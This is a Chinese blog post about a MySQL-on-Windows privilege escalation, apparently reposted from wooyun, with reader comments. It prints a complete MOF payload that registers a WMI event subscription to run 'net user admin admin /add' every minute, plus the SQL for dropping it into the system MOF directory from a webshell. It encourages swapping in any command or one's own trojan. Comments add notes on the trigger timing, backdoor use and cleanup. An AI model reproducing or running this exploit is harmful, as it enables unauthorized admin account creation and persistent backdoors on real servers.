About Mysql 的那个提权漏洞

  • A+
所属分类:lcx

这个:MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day;MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)

大致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql源码不是我能看的来的。。

大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助提权不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用:

1.找个可写目录,我这里是C:recycler,把如下代码写到nullevt.mof文件里(也就是他源码里的payload):

#pragma namespace("\\.\root\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa "Win32_LocalTime" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user admin admin /add")";
 };

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

注意上面的net.exe user admin admin /add,可以随便改的,想执行啥都行,有没有参数也都行,执行自己的马也行。

再然后,在菜刀里连接mysql数据库后执行:

select load_file('C:\RECYCLER\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

About Mysql 的那个提权漏洞

再然后。。你会发现用户添加上去了。

注:测试环境为windows 2003 + mysql 5.0.45-community-nt

win7旗舰版 sp1 + mysql-5.5.28 测试失败,2008未测试。

不过那个利用ADS新建libplugin目录的bug还在,还可以利用那个去导udf提权的。

摘自:http://zone.wooyun.org/content/1795

相关内容:

MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)

留言评论(旧系统):

佚名 @ 2012-12-04 20:32:52

And TargetInstance.Second = 5
每5秒(2013-11-28 13:49:22 补充:这里不是每5秒,应该是每分钟第五秒)执行一次(条件) WQL 查询语句
这里利用了wmi后门的方式
解决方法还是用t00ls里鬼哥给的方法吧
停止wmi 服务
删除C:WindowsSystem32wbemRepository 下所有文件
重启后系统会自动重新构建文件 就是restart
注册表
MOF Self-Install Directory
C:WindowsSystem32wbemMOF
自动安装脚本
400字限制.....

本站回复:

Good.

anfli @ 2012-12-04 20:34:34

2009年的时候有个完全以mof wmi为病毒本体的3无(无文件 无注册表 无进程)
提权是不行至少在普通情况下 因为发现 大多资料说这个需要继承SYSTEM权限才能安装脚本
也就是说mysql 是SYSTEM 启动的这个才能成功
大概只能当后门的份 当然不排除还有其他程序只有导出权限但是没有xxx的情况了列如FTP

本站回复:

╮(╯_╰)╭

tmdsb @ 2013-11-28 13:02:28

TargetInstance.Second = 5
的意思不是每5秒运行一次 而是每分钟的第5秒运行

本站回复:

感谢指正!嗯,木错,确实是每分钟第五秒,如果设置超过60则不会执行。

文章来源于lcx.cc:About Mysql 的那个提权漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: